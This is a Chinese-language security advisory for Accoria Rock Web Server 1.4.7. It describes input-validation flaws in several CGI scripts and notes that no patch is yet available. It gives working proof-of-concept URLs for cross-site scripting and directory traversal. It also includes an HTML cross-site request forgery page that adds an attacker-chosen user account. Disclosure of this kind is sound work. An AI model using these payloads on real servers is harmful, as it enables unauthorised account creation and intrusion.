Accoria Rock Web Server多个输入验证漏洞

影响版本:
Accoria Networks Rock Web Server 1.4.7

程序介绍:
Rock Web Server又被称为Accoria web server，是新一代的web服务器。

漏洞分析:

Rock Web Server的servercfg.cgi、httpcfg.cgi、loadstatic.cgi、authcfg.cgi等脚本和getenv样例代码中存在多个输入验证错误，远程攻击者可以通过提交恶意URI请求执行跨站脚本、目录遍历、跨站请求伪造等各种攻击。

漏洞利用:

http://192.168.0.101/cgibin/getenv?<html><title>deaap</title><body><blink>toeter</body></html>
http://192.168.0.101:9090/loadstatic.cgi?desc=<blink>TOETER&name=
http://192.168.0.101:9090/loadstatic.cgi?desc=%3Cblink%3ETOETER&name=../../README
http://192.168.0.101:9090/httpdcfg.cgi?type=4&name=<XSS>
http://192.168.0.101:9090/servercfg.cgi?dns=<XSS>&port=80&type=27&direct=1

<html><tilte>XSRF demo</title>

<body>
<a
href="http://192.168.0.101:9090/authcfg.cgi?path=%2Fexport%2Fhome
%2Filja%2FDesktop%2Fhttpd%2Fconf%2Fpassword&user=ilja&pwd1=deaap&
pwd2=deaap&type=21">click here to add account with user ilja,
pass deaap (you'll need to change the password path in the
link)</a>
</body></html>

解决方案:
厂商补丁：
Accoria Networks
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.accoria.com/cgi-bin/l ... Rock%20Web%20Server